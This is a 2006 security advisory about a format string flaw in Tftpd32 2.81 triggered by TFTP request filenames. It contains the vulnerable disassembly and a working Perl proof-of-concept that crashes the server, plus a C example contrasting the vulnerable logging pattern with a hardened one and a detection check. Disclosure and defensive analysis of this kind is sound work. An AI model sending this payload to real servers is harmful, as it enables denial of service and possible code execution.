[NT] Tftpd SEND and GET Format String Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Feb 2006 18:21:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Tftpd SEND and GET Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
" <http://tftpd32.jounin.net/> Tftpd32 includes DHCP, TFTP, SNTP and
Syslog servers as well as a TFTP client."
A format string vulnerability in Tftpd32 allows a remote attacker to crash
the server (DoS), and potentially to execute code, by sending a malformed
SEND or GET request.
DETAILS
Vulnerable Systems:
* Tftpd32 version 2.81
Tftpd32 passes request data to wvsprintfA as the format string instead of
as an argument, so format directives in the request are interpreted. This
allows a remote attacker to crash the server and opens the possibility of
remote code execution. The vulnerability is triggered by sending a SEND
(TFTP WRQ, opcode 2) or GET (TFTP RRQ, opcode 1) request whose filename
contains a specially formatted string such as "%.1000x".
Vulnerable code (the wvsprintfA call; the Format argument pushed from EDX
is derived from the request rather than being a constant string):
LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA
Exploit:
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research
# http://www.critical.lt
use strict;
use warnings;
use IO::Socket;

my $port = 69;            # TFTP
my $host = "127.0.0.1";   # target running Tftpd32 2.81

my $tftpudp = IO::Socket::INET->new(PeerPort => $port,
                                    PeerAddr => $host,
                                    Proto    => 'udp')
    or die "cannot create UDP socket: $!";

# TFTP read request (RRQ): 2-byte opcode, filename, NUL, mode, NUL.
my $bzz = "\x00\x01";                 # GET (RRQ, opcode 1)
$bzz .= "%.1000x\x00";                # filename: format directive reaches wvsprintfA
$bzz .= "\x6F\x63\x74\x65\x74\x00";   # "octet" transfer mode
$tftpudp->send($bzz);
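The following is an added example, not code from the advisory or from Tftpd32. It shows the request layout the PoC above sends (opcode, filename, NUL, mode, NUL), a bounds-checked parser for it, and the vulnerable logging pattern next to its hardened form. POSIX vsnprintf stands in for the Windows wvsprintfA in the disassembly; the function names (tftp_build_req, tftp_parse_req, log_vuln, log_safe, tftp_filename_has_directive) and the packet built in main are the author's own constructions.

```c
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* TFTP request opcodes (RFC 1350). The advisory's PoC sends opcode 1. */
enum { TFTP_RRQ = 1, TFTP_WRQ = 2 };

/* Parsed view of an RRQ/WRQ: opcode, filename, transfer mode. */
struct tftp_req {
    uint16_t opcode;
    char filename[256];
    char mode[32];
};

/* Build an RRQ/WRQ exactly as the PoC does: 2-byte opcode, filename NUL,
   mode NUL. Returns the datagram length, or -1 if it does not fit. */
int tftp_build_req(uint8_t *out, size_t cap, uint16_t opcode,
                   const char *filename, const char *mode)
{
    size_t fl = strlen(filename), ml = strlen(mode);
    size_t need = 2 + fl + 1 + ml + 1;
    if (need > cap) return -1;
    out[0] = (uint8_t)(opcode >> 8);
    out[1] = (uint8_t)(opcode & 0xff);
    memcpy(out + 2, filename, fl + 1);
    memcpy(out + 2 + fl + 1, mode, ml + 1);
    return (int)need;
}

/* Copy one NUL-terminated field out of the datagram without assuming a
   terminator exists; a request cut short is rejected, never over-read. */
static int take_cstr(const uint8_t *p, size_t len, size_t *pos,
                     char *dst, size_t dcap)
{
    size_t start = *pos, i = start;
    while (i < len && p[i] != 0) i++;
    if (i == len) return -1;             /* no terminator inside the datagram */
    if (i - start + 1 > dcap) return -1; /* field too long for the buffer */
    memcpy(dst, p + start, i - start);
    dst[i - start] = 0;
    *pos = i + 1;
    return 0;
}

/* Parse an RRQ/WRQ. Returns 0 on success, -1 if malformed. */
int tftp_parse_req(const uint8_t *pkt, size_t len, struct tftp_req *r)
{
    size_t pos = 2;
    if (len < 4) return -1;
    r->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (r->opcode != TFTP_RRQ && r->opcode != TFTP_WRQ) return -1;
    if (take_cstr(pkt, len, &pos, r->filename, sizeof r->filename)) return -1;
    if (take_cstr(pkt, len, &pos, r->mode, sizeof r->mode)) return -1;
    return 0;
}

/* The vulnerable pattern (wvsprintfA in Tftpd32, vsnprintf here): request
   data is the *format*. "%.1000x" makes it walk the stack, "%n" makes it
   write to it. Kept only for comparison; never call it with request data. */
static void log_vuln(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, cap, fmt, ap);   /* fmt would be the attacker's filename */
    va_end(ap);
}

/* Hardened form: constant format, untrusted data only as a %s argument. */
void log_safe(char *out, size_t cap, const struct tftp_req *r)
{
    snprintf(out, cap, "%s request for \"%s\" mode %s",
             r->opcode == TFTP_RRQ ? "GET" : "SEND", r->filename, r->mode);
}

/* Detection aid: any exploit of this bug must put a '%' in the filename. */
int tftp_filename_has_directive(const struct tftp_req *r)
{
    return strchr(r->filename, '%') != NULL;
}

int main(void)
{
    uint8_t pkt[512];
    struct tftp_req req;
    char line[512];
    /* Constructed sample: the PoC's RRQ for "%.1000x" in octet mode. */
    int n = tftp_build_req(pkt, sizeof pkt, TFTP_RRQ, "%.1000x", "octet");
    if (n < 0 || tftp_parse_req(pkt, (size_t)n, &req)) return 1;
    log_safe(line, sizeof line, &req);
    printf("%s%s\n", line, tftp_filename_has_directive(&req)
           ? "  [format directive in filename]" : "");
    log_vuln(line, sizeof line, "benign.bin"); /* safe only because the literal has no '%' */
    printf("%s\n", line);
    return 0;
}
```

With the constant-format version the PoC filename is logged verbatim as "%.1000x" and nothing is interpreted; the parser also refuses a datagram whose filename or mode lacks its NUL terminator, which is the other common way a TFTP request handler over-reads its input.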
ADDITIONAL INFORMATION
The original article can be found at:
http://www.critical.lt/?vulnerabilities/200
Related articles:
* <http://www.securiteam.com/windowsntfocus/6D00D2061G.html> TFTPD32
Directory Traversal Vulnerability
* <http://www.securiteam.com/windowsntfocus/6C00C2061A.html> TFTPD32
Buffer Overflow Vulnerability (Long filename)
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.